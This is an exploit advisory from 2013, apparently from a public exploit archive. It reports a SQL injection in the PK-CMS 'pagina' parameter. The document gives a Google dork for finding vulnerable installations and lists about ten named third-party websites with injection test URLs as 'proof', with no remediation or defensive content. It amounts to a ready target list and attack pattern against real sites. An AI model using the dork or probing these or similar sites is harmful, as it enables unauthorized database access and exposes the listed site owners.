#************************************************************** # [+] Exploit Title : PK-CMS Sql injection vulnerability # # [+] Software link : www.passoft-webdev.nl # # [+] Exploit Author : Ashiyane Digital Security Team # # [+] Tested on: Windows 7 , Linux # # [+] Google Dork : intext:"Powered by PK-CMS" # # [+] Date: 2013/09/01 # -------------------------------------------------------------------- # [+] Exploit : Sql Injection # # [+] Location : [Target]/default.asp?pagina=[Sql injection] # #------- # Proof: #------- # # http://www.clubtropicana.es/default.asp?pagina=1' # # http://www.charitas-nederland.nl//default.asp?pagina=1' # # http://www.dranadministraties.nl/default.asp?pagina=1' # # http://www.doij.nl/default.asp?pagina=1' # # http://www.familie-pool.nl/default.asp?pagina=1' # # http://www.hessenrijders.nl//default.asp?pagina=1' # # http://www.halberg.nl/default.asp?pagina=1' # # http://www.huurdershevo.nl//default.asp?pagina=1' # # http://www.galerielefournil.nl/default.asp?pagina=1' # # http://www.slangenburg.nl/default.asp?pagina=1' # # ###################### discovered by : ACC3SS ######################